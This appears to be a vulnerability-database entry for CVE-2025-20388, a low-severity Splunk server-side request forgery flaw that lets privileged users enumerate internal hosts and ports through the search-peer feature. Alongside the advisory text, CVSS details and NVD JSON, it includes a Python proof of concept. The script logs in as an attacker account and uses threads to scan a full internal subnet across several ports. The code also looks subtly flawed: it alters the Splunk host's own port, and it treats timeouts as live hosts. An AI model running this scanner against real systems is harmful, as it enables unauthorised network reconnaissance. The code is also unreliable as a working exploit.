Security Vulnerability Report
CVE-2025-20388 CVSS 2.7 LOW

Published: 2025-12-03 17:15:51
Last Modified: 2025-12-05 17:11:27

Description

In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.7, and 9.3.2411.116, a user who holds a role that contains the high privilege capability `change_authentication` could enumerate internal IP addresses and network ports when adding new search peers to a Splunk search head in a distributed environment.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.2.0 <= version < 9.2.10) - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.3.0 <= version < 9.3.8) - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.4.0 <= version < 9.4.6) - VULNERABLE
cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (9.3.2411 <= version < 9.3.2411.116) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (10.0.2503 <= version < 10.0.2503.6) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (10.1.2507 <= version < 10.1.2507.4) - VULNERABLE
Splunk Enterprise < 10.0.1
Splunk Enterprise < 9.4.6
Splunk Enterprise < 9.3.8
Splunk Enterprise < 9.2.10
Splunk Cloud Platform < 10.1.2507.4
Splunk Cloud Platform < 10.0.2503.7
Splunk Cloud Platform < 9.3.2411.116

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-20388 PoC - Splunk Search Peer Enumeration
# Requires high privilege user with change_authentication capability
import requests
import json
from concurrent.futures import ThreadPoolExecutor

SPLUNK_HOST = "https://target-splunk.example.com"
USERNAME = "attacker_user"
PASSWORD = "password"


def add_search_peer(target_ip, port=8089):
    """Attempt to add search peer to enumerate internal hosts"""
    session = requests.Session()
    login_url = f"{SPLUNK_HOST}/en-US/account/login"
    # Login to Splunk
    session.post(login_url, data={
        'username': USERNAME,
        'password': PASSWORD,
        'cval': 0
    })
    # Try to add search peer
    peer_url = f"{SPLUNK_HOST}:{port}/services/search/peers"
    try:
        response = session.post(peer_url, data={
            'name': target_ip,
            'host': target_ip,
            'uri': f"https://{target_ip}:{port}"
        }, timeout=5)
        if response.status_code == 200:
            return {"host": target_ip, "port": port, "status": "alive"}
        elif "connect failed" in response.text.lower():
            return {"host": target_ip, "port": port, "status": "host_reachable"}
        else:
            return {"host": target_ip, "port": port, "status": "unknown"}
    except requests.exceptions.Timeout:
        return {"host": target_ip, "port": port, "status": "alive"}
    except Exception as e:
        return {"host": target_ip, "port": port, "status": "error", "detail": str(e)}


def enumerate_internal_network(subnet="192.168.1", ports=[8089, 8088, 8087]):
    """Enumerate internal IPs and ports"""
    targets = [f"{subnet}.{i}" for i in range(1, 255)]
    results = []
    with ThreadPoolExecutor(max_workers=50) as executor:
        for port in ports:
            futures = [executor.submit(add_search_peer, ip, port) for ip in targets]
            for future in futures:
                result = future.result()
                if result['status'] in ['alive', 'host_reachable']:
                    results.append(result)
    return results


if __name__ == "__main__":
    print("Enumerating internal network via Splunk search peer feature...")
    findings = enumerate_internal_network()
    print(json.dumps(findings, indent=2))
```

References

https://advisory.splunk.com/advisories/SVD-2025-1207 (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-20388", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:51.427", "lastModified": "2025-12-05T17:11:26.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.7, and 9.3.2411.116, a user who holds a role that contains the high privilege capability `change_authentication` could enumerate internal IP addresses and network ports when adding new search peers to a Splunk search head in a distributed environment."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a 10.0.1, 9.4.6, 9.3.8 y 9.2.10, y en las versiones de Splunk Cloud Platform anteriores a 10.1.2507.4, 10.0.2503.7 y 9.3.2411.116, un usuario que posee un rol que contiene la capacidad de alto privilegio 'change_authentication' podría enumerar direcciones IP internas y puertos de red al añadir nuevos pares de búsqueda a una cabeza de búsqueda de Splunk en un entorno distribuido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "259A3F4B-E4D2-48BC-9AE9-C37DE94987D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.116", "matchCriteriaId": "CF33BD17-3D4D-47CC-A917-13AD9C777A47"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.6", "matchCriteriaId": "7BB42067-4A68-44D8-856A-2CC247C440E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.4", "matchCriteriaId": "93DAD528-22AD-49F4-93AB-5E1AB5D7002B"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1207", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```